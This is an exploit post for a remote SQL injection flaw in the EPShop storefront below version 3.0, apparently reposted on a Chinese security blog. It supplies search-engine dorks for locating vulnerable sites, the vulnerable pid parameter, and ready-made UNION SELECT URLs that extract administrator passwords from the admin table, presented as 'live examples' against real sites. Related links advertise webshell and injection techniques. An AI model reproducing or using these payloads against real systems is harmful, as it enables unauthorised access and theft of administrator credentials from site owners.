########################################################################################
#
# [+] Name : EPShop < 3.0 (pid) Remote SQL Injection Vulnerability
# [+] Author : mikeX - http://www.cyber-underground.net / m$n: mikeX[at]fuckoff[dot]com
# [+] Dork(s): ?action=pro_show and ?action=disppro
# [+] Greetz : Ciaran McG, -Witch-Doct0r, K_n, MegaByte, Squibs, cIpheR, mmmbud, RoMeo
#
########################################################################################
Information;
You can't download a copy coz it's now known as ECShop - http://comsenz.com/products/ecshop
They stopped supporting the old version a while ago.
Exploit;
SQL #1: http://www.target.com/?action=pro_show&pid=[SQL Injection]
SQL #2: http://www.target.com/?action=disppro&pid=[SQL Injection]
Live Examples;
http://www.xxx.net/?action=pro_show&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6+FROM+admin--
http://www.xxx.com/?action=disppro&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6,7,8,9,10,11,12,13+FROM+admin--
EPShop < 3.0 (pid) Remote SQL Injection Vulnerability
Tags:注射
添加书签: [QQ书签] [百度搜藏] [新浪ViVi] [365Key网摘] [天极网摘] [我摘] [POCO网摘] [和讯网摘]
2008-7-28 0:41:33 | 发布:admin | 分类:漏洞利用 | 评论:0 | 引用:0 | 浏览:
- 相关文章:
TriO <= 2.1 (browse.php id) Remote SQL Injection Vulnerability (2008-7-28 0:34:12)
二次sql注入 (2008-7-17 13:50:47)
深入挖掘ORACLE内部SQLINJECTION (2008-6-27 22:50:7)
SQL server取得网站路径的几种方法 (2008-6-12 11:19:0)
Mssql2005 Log备份Webshell (2008-6-12 10:40:17)
渗透中用openrowset搞shell的方法 (2008-6-2 23:18:7)
Php注入点构造 (2008-4-13 2:32:19)
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
![[POCO网摘]](javascript:d=document;t=d.selection?(d.selection.type!='None'?d.selection.createRange().text:''):(d.getSelection?d.getSelection():'');void(keyit=window.open('http://my.poco.cn/fav/storeIt.php?t='+escape(d.title)+'&u='+escape(d.location.href)+'&c='+escape(t)+'&img=http://www.h-strong.com/blog/logo.gif','keyit','scrollbars=no,width=475,height=575,status=no,resizable=yes'));keyit.focus();){kind=link}